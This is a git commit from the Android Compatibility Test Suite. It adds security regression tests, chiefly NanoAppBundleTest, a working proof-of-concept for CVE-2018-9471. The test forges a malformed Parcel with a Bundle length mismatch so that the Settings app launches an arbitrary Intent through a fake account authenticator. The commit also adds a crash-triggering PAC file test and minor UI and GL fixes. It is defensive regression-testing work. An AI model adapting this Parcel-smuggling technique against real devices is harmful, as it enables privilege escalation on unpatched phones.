diff options
author | android-build-team Robot <android-build-team-robot@google.com> | 2019-10-25 01:37:59 +0000 |
---|---|---|
committer | android-build-team Robot <android-build-team-robot@google.com> | 2019-10-25 01:37:59 +0000 |
commit | 93bc551dc33350dda0799fded8f13fc4d9751194 (patch) | |
tree | e7517e9ffd6be05addf472720040be6bd4ae0f15 | |
parent | c8b36ead3550a5b61eb2c2035f48919045caf51b (diff) | |
parent | 9bb9e5ad958385004bae01b8eb76d7f9d8d943c5 (diff) | |
download | cts-android10-qpr1-mainline-release.tar.gz |
Snap for 5964166 from 9bb9e5ad958385004bae01b8eb76d7f9d8d943c5 to qt-qpr1-aml-releaseandroid-mainline-10.0.0_r4android10-qpr1-mainline-release
Change-Id: I175ee1b314e6b8fa30f4ff9493c18e0004c3460b
8 files changed, 402 insertions, 2 deletions
diff --git a/apps/CtsVerifier/res/layout/snsr_next_button.xml b/apps/CtsVerifier/res/layout/snsr_next_button.xml index 377b236eb37..cd5a970c969 100644 --- a/apps/CtsVerifier/res/layout/snsr_next_button.xml +++ b/apps/CtsVerifier/res/layout/snsr_next_button.xml @@ -24,7 +24,8 @@ android:id="@+id/retry_button" android:layout_width="match_parent" android:layout_height="wrap_content" - android:text="@string/retry_button_text" /> + android:text="@string/retry_button_text" + android:visibility="gone" /> <Button android:id="@+id/pass_button" diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/base/BaseSensorTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/base/BaseSensorTestActivity.java index 9135c92d58f..c4ad958cafc 100644 --- a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/base/BaseSensorTestActivity.java +++ b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/base/BaseSensorTestActivity.java @@ -140,7 +140,6 @@ public abstract class BaseSensorTestActivity mRetryButton = (Button) findViewById(R.id.retry_button); mRetryButton.setOnClickListener(new retryButtonListener()); - mRetryButton.setVisibility(View.GONE); updateNextButton(false /*enabled*/); mExecutorService.execute(this); } diff --git a/hostsidetests/securitybulletin/res/bug_139806216.pac b/hostsidetests/securitybulletin/res/bug_139806216.pac new file mode 100644 index 00000000000..3a1e34d0f6a --- /dev/null +++ b/hostsidetests/securitybulletin/res/bug_139806216.pac @@ -0,0 +1,4 @@ +function FindProxyForURL(url, host){ + var x = new ArrayBuffer(1); + return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_11.java index 20079143290..9f2e9a7f781 100644 --- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_11.java +++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_11.java @@ -41,4 +41,13 @@ public class Poc19_11 extends SecurityTestCase { int code = AdbUtils.runProxyAutoConfig("bug_138442295", getDevice()); assertTrue(code != 139); // 128 + signal 11 } + + /** + * b/139806216 + */ + @SecurityTest(minPatchLevel = "2019-11") + public void testPocBug_139806216() throws Exception { + int code = AdbUtils.runProxyAutoConfig("bug_139806216", getDevice()); + assertTrue(code != 139 && code != 135); // 128 + signal 11, 128 + signal 7 + } } diff --git a/tests/tests/nativehardware/jni/AHardwareBufferGLTest.cpp b/tests/tests/nativehardware/jni/AHardwareBufferGLTest.cpp index 91949db7db8..7c48cd3071f 100644 --- a/tests/tests/nativehardware/jni/AHardwareBufferGLTest.cpp +++ b/tests/tests/nativehardware/jni/AHardwareBufferGLTest.cpp @@ -1636,6 +1636,8 @@ void AHardwareBufferGLTest::SetUpFramebuffer(int width, int height, int layer, glRenderbufferStorage(GL_RENDERBUFFER, default_formats[i], width, height); glFramebufferRenderbuffer(GL_FRAMEBUFFER, attachment_points[i], GL_RENDERBUFFER, renderbuffer); + glClearColor(0.0f, 0.0f, 0.0f, 0.0f); + glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT | GL_STENCIL_BUFFER_BIT); break; } default: FAIL() << "Unrecognized binding type"; diff --git a/tests/tests/security/AndroidManifest.xml b/tests/tests/security/AndroidManifest.xml index 42074447d39..d27f3e42ba9 100644 --- a/tests/tests/security/AndroidManifest.xml +++ b/tests/tests/security/AndroidManifest.xml @@ -51,6 +51,27 @@ </activity> <activity + android:name="android.security.cts.NanoAppBundleTest$FailActivity" + android:label="Test Nano AppBundle customized failure catch activity"> + <intent-filter> + <action android:name="android.intent.action.RUN" /> + <category android:name="android.intent.category.DEFAULT" /> + </intent-filter> + </activity> + + <service + android:name="android.security.cts.NanoAppBundleTest$AuthenticatorService" + android:enabled="true" + android:exported="true"> + <intent-filter> + <action android:name="android.accounts.AccountAuthenticator" /> + </intent-filter> + <meta-data + android:name="android.accounts.AccountAuthenticator" + android:resource="@xml/authenticator" /> + </service> + + <activity android:name="android.security.cts.SkiaJpegDecodingActivity" android:label="Test overflow in libskia JPG processing"> <intent-filter> diff --git a/tests/tests/security/res/xml/authenticator.xml b/tests/tests/security/res/xml/authenticator.xml new file mode 100644 index 00000000000..909620144f7 --- /dev/null +++ b/tests/tests/security/res/xml/authenticator.xml @@ -0,0 +1,5 @@ +<?xml version="1.0" encoding="utf-8"?> +<account-authenticator + xmlns:android="http://schemas.android.com/apk/res/android" + android:accountType="android.security.cts" + android:label="AuthenticatorTest" />
\ No newline at end of file diff --git a/tests/tests/security/src/android/security/cts/NanoAppBundleTest.java b/tests/tests/security/src/android/security/cts/NanoAppBundleTest.java new file mode 100644 index 00000000000..4f7dffca424 --- /dev/null +++ b/tests/tests/security/src/android/security/cts/NanoAppBundleTest.java @@ -0,0 +1,359 @@ +/* + * Copyright (C) 2019 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package android.security.cts; + +import android.test.AndroidTestCase; +import android.platform.test.annotations.SecurityTest; +import androidx.test.InstrumentationRegistry; + +import android.content.ComponentName; +import android.content.Context; +import android.content.ContextWrapper; +import android.content.Intent; +import android.content.IntentFilter; +import android.content.pm.ApplicationInfo; + +import android.app.Activity; +import android.app.ActivityManager; +import android.app.Service; + +import android.provider.Settings; +import android.accounts.AbstractAccountAuthenticator; +import android.accounts.Account; +import android.accounts.AccountAuthenticatorResponse; +import android.accounts.AccountManager; +import android.content.ServiceConnection; +import android.os.Bundle; +import android.os.IBinder; +import android.os.Looper; +import android.os.Parcel; +import android.os.Parcelable; +import android.os.SystemClock; + +import android.util.Log; +import android.annotation.Nullable; +import static java.lang.Thread.sleep; +import static org.junit.Assert.assertTrue; + +@SecurityTest +public class NanoAppBundleTest extends AndroidTestCase { + + private static final String TAG = "NanoAppBundleTest"; + private static final String SECURITY_CTS_PACKAGE_NAME = "android.security.cts"; + + private ServiceConnection mServiceConnection = + new ServiceConnection() { + + @Override + public void onServiceConnected(ComponentName name, IBinder binder) { + Log.i(TAG, "Authenticator service " + name + " is connected"); + } + + @Override + public void onServiceDisconnected(ComponentName name) { + Log.i(TAG, "Authenticator service " + name + "died abruptly"); + } + }; + + @Override + protected void setUp() throws Exception { + super.setUp(); + Intent serviceIntent = new Intent(mContext, AuthenticatorService.class); + mContext.startService(serviceIntent); + mContext.bindService(serviceIntent, mServiceConnection, Context.BIND_AUTO_CREATE); + } + + @Override + protected void tearDown() throws Exception { + if (mContext != null) { + Intent serviceIntent = new Intent(mContext, AuthenticatorService.class); + mContext.stopService(serviceIntent); + } + super.tearDown(); + } + + /** + * b/113527124 + */ + @SecurityTest(minPatchLevel = "2018-09") + public void testPoc_cve_2018_9471() throws Exception { + + try { + mContext = InstrumentationRegistry.getInstrumentation().getContext(); + new NanoAppBundleTest.Trigger(mContext).anyAction(); + // against vulnerable bits, the failure will get caught right after trigger. + // against patched bits, 1 minute wait to snap the test + Thread.sleep(60_000); + } catch(InterruptedException ignored) { + Log.i(TAG, "swallow interrupted exception"); + } + } + + public static class Trigger { + private static final String TAG = "Trigger"; + private Context mContext; + + public Trigger(Context context) { + mContext = context; + } + + private void trigger() { + Log.i(TAG, "start..."); + + Intent intent = new Intent(); + intent.setComponent(new ComponentName( + "com.android.settings", + "com.android.settings.accounts.AddAccountSettings")); + intent.setAction(Intent.ACTION_RUN); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + String authTypes[] = { SECURITY_CTS_PACKAGE_NAME }; + intent.putExtra("account_types", authTypes); + + mContext.startActivity(intent); + + Log.i(TAG, "finsihed."); + } + + public void anyAction() { + Log.i(TAG, "Arbitrary action starts..."); + + Intent intent = new Intent(); + + intent.setComponent(new ComponentName( + "android.security.cts", + "android.security.cts.NanoAppBundleTest$FailActivity")); + intent.setAction(Intent.ACTION_RUN); + intent.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK); + + Authenticator.setIntent(intent); + + trigger(); + + Log.i(TAG, "Arbitrary action finished."); + } + } + + // customized activity + public static class FailActivity extends Activity { + + @Override + protected void onCreate(Bundle onSavedInstanceState) { + super.onCreate(onSavedInstanceState); + + fail("Arbitrary intent executed"); + } + } + + // + // Authenticator class + // + public static class Authenticator extends AbstractAccountAuthenticator { + + private static final String TAG = "Authenticator"; + + // mAddAccountDone : flag set to check if the buggy part is got run + private boolean mAddAccountDone; + public boolean isAddAccountDone() { + return mAddAccountDone; + } + public void setAddAccountDone(boolean isDone) { + mAddAccountDone = isDone; + } + + // mAuthContext + private static Context mAuthContext; + public static Context getAuthContext() { + return mAuthContext; + } + + // mIntent : set from Trigger or setPIN + private static Intent mIntent; + public static Intent getIntent() { + return mIntent; + } + public static void setIntent(Intent intent) { + mIntent = intent; + } + + // Authenticator ctor + public Authenticator(Context context) { + super(context); + setAddAccountDone(false); + Authenticator.mAuthContext = context; + } + + @Override + public String getAuthTokenLabel(String authTokenType) { + return null; + } + + @Override + public Bundle editProperties(AccountAuthenticatorResponse accountAuthenticatorResponse, + String accountType) { + return null; + } + + @Override + public Bundle getAuthToken(AccountAuthenticatorResponse accountAuthenticatorResponse, + Account account, + String authTokenType, + Bundle bundle) { + return null; + } + + @Override + public Bundle addAccount(AccountAuthenticatorResponse response, + String accountType, + String authTokenType, + String[] requiredFeatures, + Bundle options) { + try { + Log.i(TAG, String.format("addAccount start...accountType = %s, authTokenType = %s", + accountType, authTokenType)); + Bundle bundle = new Bundle(); + Parcel parcel = GenMalformedParcel.nanoAppFilterParcel(mIntent); + bundle.readFromParcel(parcel); + parcel.recycle(); + setAddAccountDone(true); + Log.i(TAG, "addAccount finished"); + return bundle; + } catch (Exception e) { + e.printStackTrace(); + } + return null; + } + + @Override + public Bundle confirmCredentials(AccountAuthenticatorResponse accountAuthenticatorResponse, + Account account, + Bundle bundle) { + return null; + } + + @Override + public Bundle updateCredentials(AccountAuthenticatorResponse accountAuthenticatorResponse, + Account account, + String authTokenType, + Bundle bundle) { + return null; + } + + @Override + public Bundle hasFeatures(AccountAuthenticatorResponse accountAuthenticatorResponse, + Account account, + String[] features) { + return null; + } + } + + // + // AuthenticatorService + // + public static class AuthenticatorService extends Service { + + private static final String TAG = "AuthenticatorService"; + + private Authenticator mAuthenticator; + public Authenticator getAuthenticator() { + return mAuthenticator; + } + + private IBinder mBinder; + public IBinder getServiceBinder() { + return mBinder; + } + + public AuthenticatorService() { + } + + @Override + public void onCreate() { + super.onCreate(); + // critical:here have to pass the service context to authenticator, not mContext + Log.i(TAG, "creating..."); + mAuthenticator = new Authenticator(this); + } + + @Override + public IBinder onBind(Intent intent) { + try { + Log.i(TAG, "Bind starting..."); + IBinder binder = mAuthenticator.getIBinder(); + mBinder = binder; + Log.i(TAG, "Bind finished."); + return binder; + } catch (Exception e) { + Log.i(TAG, "Bind exception"); + e.printStackTrace(); + } + return null; + } + } + + // + // GenMalformedParcel + // + public static class GenMalformedParcel { + + public static Parcel nanoAppFilterParcel(Intent intent) { + Parcel data = Parcel.obtain(); + int bundleLenPos = data.dataPosition(); + data.writeInt(0xffffffff); + data.writeInt(0x4C444E42); + int bundleStartPos = data.dataPosition(); + data.writeInt(3); + + data.writeString(SECURITY_CTS_PACKAGE_NAME); + data.writeInt(4); + data.writeString("android.hardware.location.NanoAppFilter"); + data.writeLong(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(13); + + int byteArrayLenPos = data.dataPosition(); + data.writeInt(0xffffffff); + int byteArrayStartPos = data.dataPosition(); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeInt(0); + data.writeString(AccountManager.KEY_INTENT); + data.writeInt(4); + data.writeString("android.content.Intent"); + intent.writeToParcel(data, 0); + int byteArrayEndPos = data.dataPosition(); + data.setDataPosition(byteArrayLenPos); + int byteArrayLen = byteArrayEndPos - byteArrayStartPos; + data.writeInt(byteArrayLen); + data.setDataPosition(byteArrayEndPos); + + int bundleEndPos = data.dataPosition(); + data.setDataPosition(bundleLenPos); + int bundleLen = bundleEndPos - bundleStartPos; + data.writeInt(bundleLen); + data.setDataPosition(0); + + return data; + } + } +} |